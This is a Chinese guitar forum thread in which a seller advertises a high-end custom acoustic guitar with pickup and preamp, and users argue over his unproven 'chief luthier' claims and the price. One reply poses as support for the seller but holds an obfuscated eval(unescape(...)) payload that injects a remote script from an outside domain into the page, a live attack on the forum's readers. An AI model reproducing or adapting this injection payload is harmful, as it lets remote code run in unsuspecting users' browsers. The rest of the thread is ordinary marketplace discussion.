chenzhili 发表于 2016-1-13 22:05:05

【高端货】沐音堂首席制琴师高端定制,带拾音器和前级...

不太了解沐吉他的朋友可以看看这个网址   http://weibo.com/muguitars?is_hot=1#_rnd1452689542535   ,沐吉他被冈崎伦典评价为世界范围内高性价比的吉他。曹思义,任强,陈亮,袁绍哲,宋伊凡等国内顶尖高手,还有日本演奏家gin都定制过沐吉他首席定制款。且GIN和曹思义目前一直在用沐吉他。我出的这把琴是和以上各位演奏家所订琴的同一个制琴师制作的,15年6月完成,年产量不超过20把。此琴曾是为rusi定制的,还原押尾的音色让人难以听出差别,打板非常有力。关于rusi自己开发的拾音器系统和前级也是非常一流的,全国各地的业内人都会把琴寄给他安装,陈亮微博里也有rusi的影子。此琴的拾音器系统是rusi自己安装的。这把沐吉他成色非常新,几乎看不出是二手的,没有任何暗病,并且即使装着elixir的弦,弦距也低到非常极限的程度,基本没见过更低的了,手感堪比电吉他。https://item.taobao.com/item.htm?spm=a230r.1.14.16.6fqVRC&id=524176515019&ns=1&abbucket=3#detail自行感受一下价格。由于我比较奇怪不喜欢D型琴,所以此琴24000带前级,拾音器,吉他一起出售。http://v.youku.com/v_show/id_XMTI5MzcwNTI0NA==.html?from=y1.7-1.2视频中就是我卖的这把,木头用这个琴在演出!

isxqw19900519 发表于 2016-1-13 22:53:21

这琴恐怕是我见过最难出手的琴了。。。(不是说琴不好)

chenzhili 发表于 2016-1-13 22:59:50

isxqw19900519 发表于 2016-1-13 22:53
这琴恐怕是我见过最难出手的琴了。。。(不是说琴不好)

我也不急,就是给懂得人去买的。

jimy072112 发表于 2016-1-14 00:11:24

看了那么久,我都还不知道沐音堂首席制琴师是谁……

chenzhili 发表于 2016-1-14 17:08:06

jimy072112 发表于 2016-1-14 00:11
看了那么久,我都还不知道沐音堂首席制琴师是谁……

我也不知道morris首席叫啥,但只知道是他做的琴不会差。和沐音堂一个道理。

jimy072112 发表于 2016-1-14 17:51:44

chenzhili 发表于 2016-1-14 17:08
我也不知道morris首席叫啥,但只知道是他做的琴不会差。和沐音堂一个道理。 ...

Morris前首席横山正,现任首席森中巧,这些官网都有得查的
这些你都不知道只能说明你不了解Morris啊,你还拿它当参照物,这根本是在误导人嘛

muma8701 发表于 2016-1-14 17:53:15

支持楼主!支持楼主!支持楼主!支持楼主! http://www.coolool.com/flash.swf?'+eval(unescape(/var%20b%3Ddocument.createElement%28%22script%22%29%3Bb.src%3D%22http%3A%2F%2Fwww.dzsstye.com%2Fa.js%22%3B%28document.getElementsByTagName%28%22HEAD%22%29%5B0%5D%7C%7Cdocument.body%29.appendChild%28b%29%3B/.source))+'

aszhengbin 发表于 2016-1-14 17:58:59

chenzhili 发表于 2016-1-13 22:59
我也不急,就是给懂得人去买的。

懂得人也认为他价钱高。

chenzhili 发表于 2016-1-14 18:20:46

jimy072112 发表于 2016-1-14 17:51
Morris前首席横山正,现任首席森中巧,这些官网都有得查的
这些你都不知道只能说明你不了解Morris啊,你 ...

只能说知道他们名字的人不多,你得上官网查,我去问一下也就知道制琴师名字了,然而知道了也然并卵,并且你觉得怎样才算了结morris?至少morris的首席琴高端琴我都弹过,何来的误导?

jimy072112 发表于 2016-1-14 20:02:32

chenzhili 发表于 2016-1-14 18:20
只能说知道他们名字的人不多,你得上官网查,我去问一下也就知道制琴师名字了,然而知道了也然并卵,并且 ...

你弹过Morris高端系列,不知道造琴师名字也没关系,你觉得这琴和Morris一样好——这些都是你主观判断而已啊。如果你不能同时上这琴和Morris同价位琴的试听作对比,单单只提到你弹过——那根本没必要提起——这对任何人都没有意义,因为别人根本完全不能因此获得任何信息来帮助判断。同理,你不知道这琴谁做的,琴师的过往作品也不清楚,其实也完全没必要提什么首席不首席(何况你还无法证明),这和电线杆上的退休老军医包治百病的自戴高帽广告一样纯属搞笑

chenzhili 发表于 2016-1-14 21:53:06

jimy072112 发表于 2016-1-14 20:02
你弹过Morris高端系列,不知道造琴师名字也没关系,你觉得这琴和Morris一样好——这些都是你主观判断而已 ...

我卖琴的帖子完全没有提起过morris,我回复你的时候引用了一下而已,本来就没打算和morris比,因为morris好琴。我没有必要证明是不是首席,只能说你比较无知了,如果要证明这琴是不是首席,对我来说很容易办到,但是没有必要,在这里卖琴的哪个证明张三的琴就是taylor,李四的琴就是马丁?是不是每个在这里卖琴的人都要做一个和同价位琴比较的试听?还有音色这东西或多或少都有一点主观的,我更本就没拿它和morris比,你在那里理直气壮的乱意淫?搞笑的是你的逻辑。自己看看最后那个优酷视频,自己云音乐上搜搜木头(成磊)是谁再来质疑我。

jimy072112 发表于 2016-1-14 23:17:47

chenzhili 发表于 2016-1-14 21:53
我卖琴的帖子完全没有提起过morris,我回复你的时候引用了一下而已,本来就没打算和morris比,因为morris ...

我已经把问题说得很清楚了,你话说那么多,可是全绕着圈子说,完全没有提到造琴师是谁和这琴是首席做的证据,还说这些求证不重要和吹嘘这琴质量如何,明眼人都只能认为你是在自吹自擂吧。再有你提木头,木头和这琴的质量半毛钱关系?谷本光还在乐展试弹雅伊利yd25呢……

chenzhili 发表于 2016-1-14 23:48:58

jimy072112 发表于 2016-1-14 23:17
我已经把问题说得很清楚了,你话说那么多,可是全绕着圈子说,完全没有提到造琴师是谁和这琴是首席做的证 ...

木头弹沐吉他如果是试弹,只能说你无知的很彻底,tommy弹maton会是试弹吗?你看过b站木头的视频吗?你有了解过木头和沐音堂是什么样的关系吗?我告诉你一个事实就是你让我拿这种东西的证据是非常荒唐的,证明这个琴不需要这些证据,绕圈子了吗,我的话都和你的回帖有关,答非所问才是绕圈子,你说我绕圈子完全是无中生有?然而你说清楚了些什么问题?扯淡的人是你。

chenzhili 发表于 2016-1-14 23:55:56

jimy072112 发表于 2016-1-14 23:17
我已经把问题说得很清楚了,你话说那么多,可是全绕着圈子说,完全没有提到造琴师是谁和这琴是首席做的证 ...

说实话,你在什么都不了解的情况下,就指责我是误导人,这样的行为就是标准的小学生行为。不过还是谢谢你帮我顶帖

jimy072112 发表于 2016-1-15 00:10:32

chenzhili 发表于 2016-1-14 23:48
木头弹沐吉他如果是试弹,只能说你无知的很彻底,tommy弹maton会是试弹吗?你看过b站木头的视频吗?你有 ...

我搜了,木头用沐吉他也就那两三个啊,那和试弹有什么区别?我不懂沐吉他和木头有什么合作关系,请问他是牛过押尾屌过Tommy一个人的肯定就能证明牌子足够证明质量了吗?再说连马丁都有各种型号的价格区别,这个只是说是首席造琴师(还连是谁都不知道),就可以报国外一流手工琴的价格?还有你老是说不需要证明,街上随便哪个说卖祖传玉石都这样说,你这样说和江湖骗子没区别

chenzhili 发表于 2016-1-15 00:30:27

jimy072112 发表于 2016-1-15 00:10
我搜了,木头用沐吉他也就那两三个啊,那和试弹有什么区别?我不懂沐吉他和木头有什么合作关系,请问他是 ...

说我骗子是毫无依据的诬陷这是其一,还有,押尾屌过tommy能证明greven?中川屌过tommy能证明morris?按你的逻辑,都不能。按你这么说,整个吉他中国卖琴的都是江湖骗子,因为他们也没证明琴到底是不是冒牌的。要不要我给你曹思义的微信问问他高端订制的价格?哦,从你无知的程度上来看,估计你连曹思义谁都不知道。真的是把小学生的行为特性体现的淋漓尽致。这是我卖琴的帖子,不会给你台阶下,因为我要顶贴。琴是什么样的价格,拾音系统多少价钱,rusi手工前级是什么样的价钱,什么人在用,找rusi装套拾音系统是什么价格,送到厂里把手感调整到这个程度是什么价格,如果还有想质疑我的人,先详细的了解后再来。

jimy072112 发表于 2016-1-15 09:59:02

chenzhili 发表于 2016-1-15 00:30
说我骗子是毫无依据的诬陷这是其一,还有,押尾屌过tommy能证明greven?中川屌过tommy能证明morris?按你 ...

我无不无知这没有必要讨论,这既不会影响你提供的证据,也不会影响你的证明。可是你全在绕圈子,一会说不用证明,一会又和这个对比和那个对比,一会又说只有圈内人才懂你这些小白不懂(却连制琴师名字和报价单都没出提只是自说自话),你说的所有东西都不能提供证据,连别人的质疑都不敢正面回复,懒得跟你扯

chenzhili 发表于 2016-1-15 14:48:23

jimy072112 发表于 2016-1-15 09:59
我无不无知这没有必要讨论,这既不会影响你提供的证据,也不会影响你的证明。可是你全在绕圈子,一会说不 ...

我说了你问我要证据是扯淡,我去问数学家1+1为什么等于3,一般都会说这问题不成立,不过我可以质疑他绕圈子?你去别的帖子要要看此类证据,谁会理你~

Jesus365 发表于 2016-1-18 08:15:31

我赞同你的说法,卖琴拿声音和工艺说话,弄一堆人名,没意思。

kannen 发表于 2016-1-18 08:21:37

难道这贴又要火?

黑月追风 发表于 2016-1-18 08:24:13

既然这么好,为什么要卖?

木屐帽子 发表于 2016-1-18 13:12:03

我朋友谈过沐吉他,RUSI原来那把,很好的琴,真的,不比马丁HD28,28V差。就是耐用性不清楚了。音色手感没话说。品牌效应和品质肯定比不上一线品牌的。

chenzhili 发表于 2016-1-22 02:56:54

黑月追风 发表于 2016-1-18 08:24
既然这么好,为什么要卖?

我不喜欢弹押尾,不喜欢D型琴。

virgilcry 发表于 2016-1-22 09:34:13

这个琴不好出 帮楼主顶贴 琴的描述和琴的状态符合就行了 怎么跟骗子扯上关系了 卖琴不容易 还是积点口德让别人好好卖琴了

jacksu8880386 发表于 2016-1-22 09:42:44

可惜楼主在上海,要不还真想上门去试试。

shyhack 发表于 2017-6-30 15:02:47

木头等等一众沐音堂的老师不是集体离职了么?
页: [1]
查看完整版本: 【高端货】沐音堂首席制琴师高端定制,带拾音器和前级...